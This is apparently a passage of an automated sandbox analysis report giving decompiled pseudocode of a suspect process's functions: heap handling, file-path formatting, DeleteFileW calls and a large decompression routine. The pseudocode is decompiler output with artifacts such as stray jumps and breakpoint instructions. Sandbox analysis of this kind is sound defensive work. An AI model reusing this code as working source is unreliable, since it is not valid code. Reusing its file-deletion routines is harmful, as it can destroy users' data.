memoryCOMMON

C-Code - Quality: 76%

			E002A67DC(intOrPtr __ecx, void* __edx, long* __edi) {
				void* _t4;
				void* _t9;
				void* _t17;
				void* _t19;

				_t9 = __edx;
				 *((intOrPtr*)(_t19 - 4)) = __ecx;
				_t4 = RtlAllocateHeap(GetProcessHeap(), 8,  *__edi);
				_t17 = _t4;
				if(_t17 == 0) {
					L4:
					goto 0x5a1546;
					asm("int3");
					return _t4;
				} else {
					_push(_t9);
					_push( *((intOrPtr*)(_t19 - 4)));
					if(L002A2D50(_t17, __edi) == 0) {
						_t4 = _t17;
						goto L4;
					} else {
						HeapFree(GetProcessHeap(), 0, _t17);
						return 0;
					}
				}
			}

0x002a67dc
0x002a67de
0x002a67ec
0x002a67f2
0x002a67f6
0x002a6827
0x002a6827
0x002a682c
0x002a682d
0x002a67f8
0x002a67f8
0x002a67f9
0x002a680a
0x002a6825
0x00000000
0x002a680c
0x002a6816
0x002a6824
0x002a6824
0x002a680a

APIs

GetProcessHeap.KERNEL32(00000008), ref: 002A67E5
RtlAllocateHeap.NTDLL(00000000), ref: 002A67EC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A680F
HeapFree.KERNEL32(00000000), ref: 002A6816

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: d3f86bdde9d9a96767721da2de6b8f33991382b1c4e7f07f938f2a38f629f4a0
Instruction ID: 320e3616bd51a4f2c5a1e4091440b5a2a4b1ee04cab1e7175a82e641196edd38
Opcode Fuzzy Hash: d3f86bdde9d9a96767721da2de6b8f33991382b1c4e7f07f938f2a38f629f4a0
Instruction Fuzzy Hash: ADF0E571B01A20ABCB025BB97C0C72DBA59EF4C312F080165FE09DA250EE718C109A90

Uniqueness

Uniqueness Score: 0.01%

Function 002A6878, Relevance: 6.0, APIs: 4, Instructions: 30
memoryCOMMON

C-Code - Quality: 66%

			E002A6878(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t17;
				void* _t18;
				void* _t28;
				void* _t30;
				void* _t32;

				_t30 = __esi;
				_t18 = __ebx;
				_t28 = L002A1D00(__ecx, 0xcc, __edi);
				_t12 =  *0x2b59dc(_t18, _t30, _t28, GetTickCount() % 0xffff);
				HeapFree(GetProcessHeap(), 0, _t28);
				_push(_t18 + _t12 * 2);
				L002A1850( *((intOrPtr*)( *((intOrPtr*)(_t32 - 4)))),  *((intOrPtr*)( *((intOrPtr*)(_t32 - 4)) + 4)));
				_t17 = _t18;
				goto 0x5a1578;
				return _t17;
			}

0x002a6878
0x002a6878
0x002a6882
0x002a6897
0x002a68ac
0x002a68b8
0x002a68be
0x002a68c6
0x002a68c9
0x002a68ce

APIs

GetTickCount.KERNEL32 ref: 002A6884
_snwprintf.NTDLL ref: 002A6897
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A68A5
HeapFree.KERNEL32(00000000), ref: 002A68AC

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$CountFreeProcessTick_snwprintf
String ID:
API String ID: 3064400467-0
Opcode ID: dac601febb91659b76a0667d7d2a6d8670fa3625f27978a4498d65c46145d539
Instruction ID: 56450195390ce6aa58bd329890d11f0c3e35f598b437545c5fa2a359ba8b1504
Opcode Fuzzy Hash: dac601febb91659b76a0667d7d2a6d8670fa3625f27978a4498d65c46145d539
Instruction Fuzzy Hash: DFF0A0B0A00910AFE704AB64EC4DB2F3A6AEFC9355F14457CF40B8F292E9359C15CBA1

Uniqueness

Uniqueness Score: 4.01%

Function 002AF7FE, Relevance: 6.0, APIs: 4, Instructions: 29
memoryfileCOMMON

C-Code - Quality: 58%

			E002AF7FE(void* __esi) {
				void* _t7;
				void* _t17;
				void* _t19;
				void* _t21;

				 *0x2b5a94();
				_t19 = L002A1D00(0x2b40a0, 0xf0, _t17);
				_t7 = _t21 - 0x410;
				 *0x2b59dc(_t21 - 0x208, 0x104, _t19, _t21 - 0x618, _t7, _t7, 0x67165621);
				HeapFree(GetProcessHeap(), 0, _t19);
				return DeleteFileW(_t21 - 0x208);
			}

0x002af7fe
0x002af818
0x002af81a
0x002af836
0x002af849
0x002af860

APIs

_snwprintf.NTDLL ref: 002AF836
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002AF842
HeapFree.KERNEL32(00000000), ref: 002AF849
DeleteFileW.KERNEL32(?), ref: 002AF856

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$DeleteFileFreeProcess_snwprintf
String ID:
API String ID: 3158849725-0
Opcode ID: da1e5b45d3da1f43c4dffa52c61c4dc339b4651102b06051ea80a03247131029
Instruction ID: 4d5d8d047b0f4ee0c05c5d14e7e95fd98b35bfa700eabd0850ba6788e7e69c84
Opcode Fuzzy Hash: da1e5b45d3da1f43c4dffa52c61c4dc339b4651102b06051ea80a03247131029
Instruction Fuzzy Hash: A3F03772911528ABD710ABA4FC4CFDB376CEB04355F000292FA0ADA052DA7159908BA0

Uniqueness

Uniqueness Score: 0.09%

Function 002AF7C2, Relevance: 6.0, APIs: 4, Instructions: 25
memoryfileCOMMON

C-Code - Quality: 75%

			E002AF7C2(void* __esi) {
				void* _t12;
				void* _t14;
				void* _t16;
				void* _t18;

				_t16 = L002A1D00(_t12, 0xcc, _t14);
				 *0x2b59dc(_t18 - 0x208, 0x104, _t16, 0x2b81f0, _t18 - 0x410);
				HeapFree(GetProcessHeap(), 0, _t16);
				return DeleteFileW(_t18 - 0x208);
			}

0x002af7c9
0x002af7e4
0x002af849
0x002af860

APIs

_snwprintf.NTDLL ref: 002AF7E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002AF842
HeapFree.KERNEL32(00000000), ref: 002AF849
DeleteFileW.KERNEL32(?), ref: 002AF856

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$DeleteFileFreeProcess_snwprintf
String ID:
API String ID: 3158849725-0
Opcode ID: 9900b704e75d841cee7c017c793428c90e2b53d2982f23dbb9728a71d0faf671
Instruction ID: 8078012984de498539bd619529a0544362e6b13774a62610ad5097d969554a12
Opcode Fuzzy Hash: 9900b704e75d841cee7c017c793428c90e2b53d2982f23dbb9728a71d0faf671
Instruction Fuzzy Hash: 8FE01272961629ABC710ABA4BC4DBDA376CEB05355F0002D2F50EEA051DEB555908BA1

Uniqueness

Uniqueness Score: 0.09%

Function 002AFCAD, Relevance: 6.0, APIs: 4, Instructions: 24
memoryfileCOMMON

C-Code - Quality: 75%

			E002AFCAD(void* __edi, void* __esi) {
				void* _t11;
				void* _t16;
				void* _t18;

				_t16 = L002A1D00(_t11, 0xcc, __edi);
				 *0x2b59dc(_t18 - 0x430, 0x104, _t16, 0x2b7ee0);
				HeapFree(GetProcessHeap(), 0, _t16);
				DeleteFileW(_t18 - 0x430);
				return __edi;
			}

0x002afcb4
0x002afcc8
0x002afcdb
0x002afce8
0x002afcf5

APIs

_snwprintf.NTDLL ref: 002AFCC8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002AFCD4
HeapFree.KERNEL32(00000000), ref: 002AFCDB
DeleteFileW.KERNEL32(?), ref: 002AFCE8

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$DeleteFileFreeProcess_snwprintf
String ID:
API String ID: 3158849725-0
Opcode ID: 9850c81a8cacfdb677eafab8acc98f489101ecc666059c2f6f5ddb9ae3aff584
Instruction ID: e7c1de02180ac83104bbcac88d1084d4952b393cc096764db44ef968b1100751
Opcode Fuzzy Hash: 9850c81a8cacfdb677eafab8acc98f489101ecc666059c2f6f5ddb9ae3aff584
Instruction Fuzzy Hash: 1FE0487161162467C7107BA5BC0DBDE375CEB45366F040295F60DDA141D57155148BA0

Uniqueness

Uniqueness Score: 0.09%

Function 002A5BD5, Relevance: 5.1, APIs: 4, Instructions: 82
COMMON

C-Code - Quality: 68%

			E002A5BD5(void* __ebx, void __edi, signed int __esi) {
				signed int _t597;
				signed int _t599;
				void* _t600;
				signed int _t610;
				signed int* _t620;
				signed int _t623;
				signed int _t640;
				signed int _t642;
				signed int _t644;
				signed int _t652;
				signed int _t655;
				signed int _t657;
				signed int _t660;
				signed int _t666;
				signed int _t669;
				signed int _t671;
				void* _t673;
				signed int _t676;
				signed int _t680;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				signed int _t690;
				unsigned int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t699;
				signed int _t709;
				signed int _t714;
				signed int _t716;
				signed int _t719;
				signed int _t721;
				signed int _t722;
				intOrPtr _t734;
				intOrPtr _t735;
				intOrPtr _t736;
				signed int _t739;
				signed int _t743;
				void* _t749;
				signed int _t754;
				signed int _t756;
				signed int _t760;
				signed int _t764;
				signed int _t767;
				signed int _t771;
				void* _t776;
				signed int _t780;
				void* _t781;
				signed int _t786;
				void* _t787;
				void* _t788;
				signed int _t793;
				signed int _t794;
				void* _t796;
				signed int _t797;
				signed int _t804;
				signed int _t806;
				intOrPtr* _t808;
				void* _t809;
				signed int _t820;
				signed int _t822;
				intOrPtr _t824;
				signed char _t828;
				intOrPtr* _t830;
				void* _t831;
				signed int _t839;
				void* _t841;
				void* _t843;
				signed int _t845;
				intOrPtr _t846;
				signed int _t856;
				signed int _t859;
				void* _t860;
				void* _t861;
				void* _t862;
				void* _t863;
				void* _t864;
				void* _t865;
				void* _t866;
				void* _t867;
				signed char _t868;
				signed char _t871;
				intOrPtr _t873;
				signed int _t876;
				void* _t877;
				signed char _t879;
				signed int _t880;
				signed int _t881;
				signed char _t886;
				signed int _t888;
				void* _t889;
				void* _t890;
				signed int _t893;
				signed char _t894;
				intOrPtr _t896;
				intOrPtr _t898;
				void* _t901;
				signed char _t902;
				signed char _t903;
				void _t904;
				signed int _t908;
				signed char _t913;
				void* _t914;
				void* _t915;
				signed int _t918;
				void* _t923;
				signed int _t927;
				signed char _t931;
				signed int _t932;
				signed char _t935;
				signed int _t936;
				void* _t944;
				signed int _t959;
				unsigned int _t962;
				signed int _t963;
				signed int _t965;
				signed int _t969;
				signed int* _t970;
				signed char* _t975;
				void* _t976;
				void* _t981;
				signed int _t982;
				signed int _t983;
				signed int _t986;
				signed int _t987;
				signed int _t989;
				signed int _t991;
				signed int _t992;
				signed int _t995;
				signed int _t999;
				signed int _t1005;
				signed int _t1006;
				int _t1007;
				int _t1009;
				signed int _t1010;
				unsigned int _t1013;
				void* _t1017;
				intOrPtr _t1018;
				signed char _t1019;
				void _t1022;
				void* _t1024;
				signed int _t1025;
				void* _t1027;
				int _t1032;
				signed int _t1033;
				void* _t1035;
				unsigned int _t1036;
				signed int _t1037;
				void* _t1038;
				void* _t1040;
				signed int _t1042;
				signed int _t1043;
				unsigned int _t1045;
				signed int _t1046;
				unsigned int _t1048;
				signed int _t1049;
				signed char _t1057;
				void* _t1058;
				void* _t1060;
				void* _t1061;

				L0:
				while(1) {
					L0:
					_t1043 = __esi;
					_t1022 = __edi;
					_t841 = __ebx;
					_t596 = memset(__edi + 0x1b80, 0, ??);
					_t962 =  *(_t1058 - 4);
					_t1061 = _t1060 + 0xc;
					while(1) {
						L135:
						 *(_t1058 - 8) = _t893;
						__eflags = _t893 -  *((intOrPtr*)(_t1022 + 0x34));
						if(_t893 >=  *((intOrPtr*)(_t1022 + 0x34))) {
							break;
						}
						L136:
						__eflags = _t1043 - 3;
						if(_t1043 >= 3) {
							L139:
							_t927 = _t991 & 0x00000007;
							_t991 = _t991 >> 3;
							_t1043 = _t1043 - 3;
							 *(_t1058 - 4) = _t991;
							 *(_t1058 - 0x1c) = _t1043;
							_t596 =  *( *(_t1058 - 8) + 0x2b1a24) & 0x000000ff;
							 *(_t596 + _t1022 + 0x1b80) = _t927;
							_t893 =  *(_t1058 - 8) + 1;
							continue;
						} else {
							while(1) {
								L137:
								__eflags = _t841 -  *(_t1058 - 0x20);
								if(_t841 >=  *(_t1058 - 0x20)) {
									break;
								}
								L138:
								_t596 = ( *_t841 & 0x000000ff) << _t1043;
								_t841 = _t841 + 1;
								_t991 = _t991 | _t596;
								 *(_t1058 - 0x18) = _t841;
								_t1043 = _t1043 + 8;
								 *(_t1058 - 4) = _t991;
								__eflags = _t1043 - 3;
								if(_t1043 < 3) {
									continue;
								} else {
									goto L139;
								}
								goto L295;
							}
							L249:
							 *_t1022 = 0xe;
							L285:
							__eflags =  *(_t1058 + 0x18) & 0x00000002;
							L286:
							L287:
							_t597 =  !=  ? 1 : _t596;
							 *(_t1058 - 0xc) = _t597;
							__eflags = _t597 - 1;
							if(_t597 != 1) {
								L288:
								__eflags = _t597 - 0xfffffffc;
								if(_t597 != 0xfffffffc) {
									L289:
									L292:
									_t642 =  *(_t1058 - 0x3c);
									__eflags = _t841 - _t642;
									if(_t841 > _t642) {
										while(1) {
											L293:
											__eflags = _t1043 - 8;
											if(_t1043 < 8) {
												goto L295;
											}
											L294:
											_t841 = _t841 - 1;
											_t1043 = _t1043 - 8;
											__eflags = _t841 - _t642;
											if(_t841 > _t642) {
												continue;
											}
											goto L295;
										}
									}
								}
							}
						}
						L295:
						_t963 =  *(_t1058 - 4);
						L296:
						 *(_t1022 + 4) = _t1043;
						asm("bts ecx, esi");
						__eflags = _t1043 - 0x20;
						_t599 =  >=  ? 0 : 0;
						_t856 = 0 ^ _t599;
						__eflags = _t1043 - 0x40;
						_t600 =  >=  ? _t856 : _t599;
						 *(_t1022 + 0x20) =  *(_t1058 - 0x28);
						_t965 =  *(_t1058 - 0x10) -  *(_t1058 + 0x10);
						__eflags =  *(_t1058 + 0x18) & 0x00000009;
						 *(_t1022 + 0x24) =  *(_t1058 - 8);
						 *(_t1022 + 0x28) =  *(_t1058 - 0x38);
						 *((intOrPtr*)(_t1022 + 0x3c)) =  *((intOrPtr*)(_t1058 - 0x48));
						 *(_t1022 + 0x38) = _t856 - 0x00000001 & _t963;
						 *(_t1058 - 0x10) = _t965;
						 *((intOrPtr*)( *((intOrPtr*)(_t1058 + 8)))) = _t841 -  *(_t1058 - 0x3c);
						_t843 =  *(_t1058 - 0xc);
						 *( *(_t1058 + 0x14)) = _t965;
						if(( *(_t1058 + 0x18) & 0x00000009) != 0) {
							L297:
							__eflags = _t843;
							if(_t843 >= 0) {
								L298:
								_t1045 =  *(_t1022 + 0x1c);
								_t859 = _t1045 & 0x0000ffff;
								_t610 = (0x5e6ea9af * _t965 >> 0x20 >> 0xb) * 0x15b0;
								_t1046 = _t1045 >> 0x10;
								 *(_t1058 - 0x3c) = _t1046;
								_t969 =  *(_t1058 - 0x10) - _t610;
								__eflags =  *(_t1058 - 0x10);
								 *(_t1058 - 0x34) = _t969;
								if( *(_t1058 - 0x10) != 0) {
									L299:
									_t845 = _t969;
									do {
										L300:
										_t970 = 0;
										 *(_t1058 + 0x14) = 0;
										__eflags = _t845 - 7;
										if(_t845 > 7) {
											L301:
											goto 0x5a149d;
											asm("int3");
											asm("int3");
											asm("int3");
											L302:
											_t1024 = _t1022 - _t610;
											__eflags = _t1024;
											do {
												L303:
												_t970 =  &(_t970[2]);
												_t861 = _t859 + ( *_t610 & 0x000000ff);
												_t862 = _t861 + ( *( *(_t1058 + 0x10) + 1) & 0x000000ff);
												_t863 = _t862 + ( *( *(_t1058 + 0x10) + 2) & 0x000000ff);
												_t864 = _t863 + ( *( *(_t1058 + 0x10) + 3) & 0x000000ff);
												_t865 = _t864 + ( *( *(_t1058 + 0x10) + 4) & 0x000000ff);
												_t866 = _t865 + ( *( *(_t1058 + 0x10) + 5) & 0x000000ff);
												_t867 = _t866 + ( *( *(_t1058 + 0x10) + 6) & 0x000000ff);
												_t859 = _t867 + ( *( *(_t1058 + 0x10) + 7) & 0x000000ff);
												_t640 =  *(_t1058 + 0x10) + 8;
												_t1046 = _t1046 + _t861 + _t862 + _t863 + _t864 + _t865 + _t866 + _t867 + _t859;
												 *(_t1058 + 0x10) = _t640;
												__eflags = _t1024 + _t640 - _t845;
												_t610 =  *(_t1058 + 0x10);
											} while (_t1024 + _t640 < _t845);
											 *(_t1058 + 0x14) = _t970;
											 *(_t1058 - 0x3c) = _t1046;
										}
										L305:
										_t1022 = 0;
										 *((intOrPtr*)(_t1058 + 8)) = 0;
										__eflags = _t970 - _t845;
										if(_t970 < _t845) {
											L306:
											__eflags = _t845 - _t970 - 2;
											if(_t845 - _t970 >= 2) {
												L307:
												_t620 =  *(_t1058 + 0x14);
												_t1049 =  *(_t1058 + 0x10);
												_t846 = 0;
												_t981 = (_t845 - _t620 - 2 >> 1) + 1;
												__eflags = _t981;
												 *(_t1058 + 0x14) = _t620 + _t981 * 2;
												do {
													L308:
													_t860 = _t859 + ( *_t1049 & 0x000000ff);
													_t623 =  *(_t1049 + 1) & 0x000000ff;
													_t1022 = _t1022 + _t860;
													_t1049 = _t1049 + 2;
													_t859 = _t860 + _t623;
													_t846 = _t846 + _t859;
													_t981 = _t981 - 1;
													__eflags = _t981;
												} while (_t981 != 0);
												_t970 =  *(_t1058 + 0x14);
												 *(_t1058 + 0x10) = _t1049;
												_t1046 =  *(_t1058 - 0x3c);
												 *((intOrPtr*)(_t1058 + 8)) = _t846;
												_t845 =  *(_t1058 - 0x34);
											}
											L310:
											__eflags = _t970 - _t845;
											if(_t970 < _t845) {
												_t975 =  *(_t1058 + 0x10);
												_t859 = _t859 + ( *_t975 & 0x000000ff);
												_t1046 = _t1046 + _t859;
												_t976 =  &(_t975[1]);
												__eflags = _t976;
												 *(_t1058 + 0x10) = _t976;
											}
											L312:
											_t610 =  *((intOrPtr*)(_t1058 + 8)) + _t1022;
											_t1046 = _t1046 + _t610;
											__eflags = _t1046;
										}
										L313:
										L314:
										_t859 = _t859 + (_t610 * _t859 >> 0x20 >> 0xf) * 0xffff000f;
										_t610 = (0x80078071 * _t1046 >> 0x20 >> 0xf) * 0xffff000f;
										_t1046 = _t1046 + _t610;
										_t586 = _t1058 - 0x10;
										 *_t586 =  *(_t1058 - 0x10) - _t845;
										__eflags =  *_t586;
										_t845 = 0x15b0;
										 *(_t1058 - 0x3c) = _t1046;
										 *(_t1058 - 0x34) = 0x15b0;
									} while ( *_t586 != 0);
									goto 0x5a14c6;
									asm("int3");
								}
								L316:
								_t1048 = (_t1046 << 0x10) + _t859;
								 *(_t1022 + 0x1c) = _t1048;
								__eflags = _t843;
								if(_t843 == 0) {
									__eflags =  *(_t1058 + 0x18) & 0x00000001;
									if(( *(_t1058 + 0x18) & 0x00000001) != 0) {
										__eflags = _t1048 -  *(_t1022 + 0x10);
										_t843 =  !=  ? 0xfffffffe : _t843;
									}
								}
							}
						}
						L319:
						return _t843;
						L320:
					}
					L140:
					 *((intOrPtr*)(_t1022 + 0x34)) = 0x13;
					while(1) {
						L141:
						_t694 =  *(_t1022 + 0x18);
						__eflags = _t694;
						if(_t694 >= 0) {
							break;
						}
						L218:
						_t982 =  *(_t1058 - 4);
						while(1) {
							L39:
							_t879 =  *(_t1058 - 0x20) - _t841;
							__eflags = _t879 - 4;
							if(_t879 < 4) {
								goto L58;
							}
							L40:
							_t1022 =  *(_t1058 - 0x14);
							__eflags =  *((intOrPtr*)(_t1058 - 0x40)) -  *(_t1058 - 0x10) - 2;
							if( *((intOrPtr*)(_t1058 - 0x40)) -  *(_t1058 - 0x10) < 2) {
								goto L58;
							} else {
								L41:
								__eflags = _t1043 - 0xf;
								if(_t1043 < 0xf) {
									_t995 =  *(_t841 + 1) & 0x000000ff;
									_t879 = _t1043;
									_t722 =  *_t841 & 0x000000ff;
									_t841 = _t841 + 2;
									 *(_t1058 - 0x18) = _t841;
									 *(_t1058 - 4) =  *(_t1058 - 4) | (_t995 << 0x00000008 | _t722) << _t879;
									_t1043 = _t1043 + 0x10;
									__eflags = _t1043;
									_t982 =  *(_t1058 - 4);
								}
								_t596 =  *((short*)(_t1022 + 0x160 + (_t982 & 0x000003ff) * 2));
								 *(_t1058 - 8) = _t596;
								__eflags = _t596;
								if(_t596 < 0) {
									L45:
									goto 0x5a1333;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L46:
										_t709 = _t982 >> _t879;
										_t879 = _t879 + 1;
										_t596 = (_t709 & 0x00000001) +  !_t841;
										_t841 =  *((short*)(_t1022 + 0x960 + _t596 * 2));
										__eflags = _t841;
									} while (_t841 < 0);
									 *(_t1058 - 8) = _t841;
									_t841 =  *(_t1058 - 0x18);
								} else {
									L44:
									_t879 = _t596 >> 9;
								}
								L48:
								_t962 = _t982 >> _t879;
								_t1043 = _t1043 - _t879;
								_t880 =  *(_t1058 - 8);
								 *(_t1058 - 4) = _t962;
								__eflags = _t880 & 0x00000100;
								if((_t880 & 0x00000100) != 0) {
									L84:
									_t881 = _t880 & 0x000001ff;
									 *(_t1058 - 8) = _t881;
									__eflags = _t881 - 0x100;
									if(_t881 != 0x100) {
										L219:
										_t673 = _t881 * 4 - 0x404;
										_t868 =  *(_t673 + 0x2b1010);
										_t596 =  *(_t673 + 0x2b1a48);
										 *(_t1058 - 0x38) = _t868;
										 *(_t1058 - 8) = _t596;
										__eflags = _t868;
										if(_t868 == 0) {
											L225:
											__eflags = _t1043 - 0xf;
											if(_t1043 >= 0xf) {
												L3:
												_t655 =  *((short*)(_t1022 + 0xf00 + (_t962 & 0x000003ff) * 2));
												 *(_t1058 - 0x1c) = _t655;
												if(_t655 < 0) {
													L5:
													goto 0x5a12ba;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L7:
														_t657 = _t962 >> _t868;
														_t868 = _t868 + 1;
														_t841 =  *((short*)(_t1022 + 0x1700 + ((_t657 & 0x00000001) +  !_t841) * 2));
														__eflags = _t841;
													} while (_t841 < 0);
													 *(_t1058 - 0x1c) = _t841;
													_t841 =  *(_t1058 - 0x18);
													_t660 =  *(_t1058 - 0x1c);
												} else {
													L4:
													_t868 = _t655 >> 9;
													_t660 = _t655 & 0x000001ff;
												}
												L9:
												_t982 = _t962 >> _t868;
												_t1043 = _t1043 - _t868;
												_t871 =  *(0x2b1090 + _t660 * 4);
												_t596 =  *(0x2b1110 + _t660 * 4);
												 *(_t1058 - 4) = _t982;
												 *(_t1058 - 0x38) = _t871;
												 *(_t1058 - 0x28) = _t596;
												if(_t871 == 0) {
													L15:
													_t873 =  *(_t1058 - 0x10) -  *((intOrPtr*)(_t1058 + 0xc));
													 *((intOrPtr*)(_t1058 - 0x48)) = _t873;
													if(_t596 <= _t873 || ( *(_t1058 + 0x18) & 0x00000004) == 0) {
														L17:
														_t1022 =  *(_t1058 - 0x14);
														_t876 = (_t873 - _t596 &  *(_t1058 - 0x34)) +  *((intOrPtr*)(_t1058 + 0xc));
														 *(_t1058 - 0xc) = _t876;
														_t662 =  >  ?  *(_t1058 - 0x10) : _t876;
														_t877 =  *(_t1058 - 8);
														_t663 = ( >  ?  *(_t1058 - 0x10) : _t876) + _t877;
														_t1075 = ( >  ?  *(_t1058 - 0x10) : _t876) + _t877 -  *((intOrPtr*)(_t1058 - 0x40));
														if(( >  ?  *(_t1058 - 0x10) : _t876) + _t877 <=  *((intOrPtr*)(_t1058 - 0x40))) {
															L21:
															__eflags = _t877 - 9;
															if(_t877 < 9) {
																L30:
																goto 0x5a12f7;
																asm("int3");
																do {
																	L32:
																	_t877 = _t877 - 3;
																	 *_t1022 =  *_t982 & 0x000000ff;
																	 *((char*)(_t1022 + 1)) =  *(_t982 + 1) & 0x000000ff;
																	_t666 =  *(_t982 + 2) & 0x000000ff;
																	_t982 = _t982 + 3;
																	 *(_t1022 + 2) = _t666;
																	_t1022 = _t1022 + 3;
																	__eflags = _t877 - 2;
																} while (_t877 > 2);
																goto L33;
															} else {
																L22:
																__eflags = _t877 -  *(_t1058 - 0x28);
																if(_t877 >  *(_t1058 - 0x28)) {
																	goto L30;
																} else {
																	L23:
																	_t1042 =  *(_t1058 - 0xc);
																	_t959 =  *(_t1058 - 0x10);
																	_t828 = (_t877 & 0xfffffff8) + _t1042;
																	 *(_t1058 - 0x24) = _t828;
																	_t1019 = _t828;
																	do {
																		L24:
																		 *_t959 =  *_t1042;
																		_t830 =  *((intOrPtr*)(_t1042 + 4));
																		_t1042 = _t1042 + 8;
																		 *((intOrPtr*)(_t959 + 4)) = _t830;
																		_t959 = _t959 + 8;
																		__eflags = _t1042 - _t1019;
																	} while (_t1042 < _t1019);
																	_t982 =  *(_t1058 - 4);
																	 *(_t1058 - 0x10) = _t959;
																	_t877 =  *(_t1058 - 8) & 0x00000007;
																	 *(_t1058 - 0xc) = _t1042;
																	_t1022 =  *(_t1058 - 0x14);
																	 *(_t1058 - 8) = _t877;
																	__eflags = _t877 - 3;
																	if(_t877 >= 3) {
																		goto L30;
																	} else {
																		goto L26;
																	}
																}
															}
															continue;
														} else {
															while(1) {
																L18:
																_t831 = _t877;
																_t877 = _t877 - 1;
																 *(_t1058 - 8) = _t877;
																if(_t831 == 0) {
																	goto L39;
																}
																L19:
																if( *(_t1058 - 0x10) >=  *((intOrPtr*)(_t1058 - 0x40))) {
																	L238:
																	 *(_t1058 - 0xc) = 2;
																	 *_t1022 = 0x35;
																	goto L292;
																} else {
																	L20:
																	 *(_t1058 - 0x10) =  *(_t1058 - 0x10) + 1;
																	 *((intOrPtr*)(_t1058 - 0x48)) =  *((intOrPtr*)(_t1058 - 0x48)) + 1;
																	 *( *(_t1058 - 0x10)) =  *((intOrPtr*)(( *((intOrPtr*)(_t1058 - 0x48)) -  *(_t1058 - 0x28) &  *(_t1058 - 0x34)) +  *((intOrPtr*)(_t1058 + 0xc))));
																	_t982 =  *(_t1058 - 4);
																	continue;
																}
																goto L295;
															}
															while(1) {
																L39:
																_t879 =  *(_t1058 - 0x20) - _t841;
																__eflags = _t879 - 4;
																if(_t879 < 4) {
																	goto L58;
																}
																goto L40;
															}
															goto L58;
														}
													} else {
														L270:
														_t684 = _t596 | 0xffffffff;
														 *_t1022 = 0x25;
														goto L291;
													}
												} else {
													L10:
													if(_t1043 >= _t871) {
														L13:
														_t1043 = _t1043 - _t871;
														_t839 = (_t596 << _t871) - 0x00000001 & _t982;
														_t982 = _t982 >> _t871;
														 *(_t1058 - 0x28) =  *(_t1058 - 0x28) + _t839;
														_t596 =  *(_t1058 - 0x28);
														 *(_t1058 - 4) = _t982;
														goto L15;
													} else {
														L11:
														while(_t841 <  *(_t1058 - 0x20)) {
															_t596 = ( *_t841 & 0x000000ff) << _t1043;
															_t841 = _t841 + 1;
															_t871 =  *(_t1058 - 0x38);
															_t982 = _t982 | _t596;
															_t1043 = _t1043 + 8;
															 *(_t1058 - 0x18) = _t841;
															 *(_t1058 - 4) = _t982;
															if(_t1043 < _t871) {
																continue;
															} else {
																goto L13;
															}
															goto L295;
														}
														 *_t1022 = 0x1b;
														goto L285;
													}
												}
											} else {
												L226:
												__eflags =  *(_t1058 - 0x20) - _t841 - 2;
												if( *(_t1058 - 0x20) - _t841 >= 2) {
													L237:
													_t983 =  *(_t841 + 1) & 0x000000ff;
													_t676 =  *_t841 & 0x000000ff;
													_t841 = _t841 + 2;
													_t1022 =  *(_t1058 - 0x14);
													_t868 = _t1043;
													 *(_t1058 - 0x18) = _t841;
													 *(_t1058 - 4) =  *(_t1058 - 4) | _t983 << _t1043 + 0x00000008 | _t676 << _t868;
													_t1043 = _t1043 + 0x10;
													_t962 =  *(_t1058 - 4);
												} else {
													do {
														L227:
														_t596 =  *((short*)(_t1022 + 0xf00 + (_t962 & 0x000003ff) * 2));
														 *(_t1058 - 0x24) = _t596;
														__eflags = _t596;
														if(_t596 < 0) {
															L231:
															__eflags = _t1043 - 0xa;
															if(_t1043 <= 0xa) {
																goto L1;
															} else {
																L232:
																L233:
																 *(_t1058 - 0x1c) = _t868;
																while(1) {
																	L234:
																	_t868 =  *((short*)(_t1022 + 0x1700 + ((_t962 >> _t868 & 0x00000001) +  !( *(_t1058 - 0x24))) * 2));
																	_t652 =  *(_t1058 - 0x1c) + 1;
																	 *(_t1058 - 0x24) = _t868;
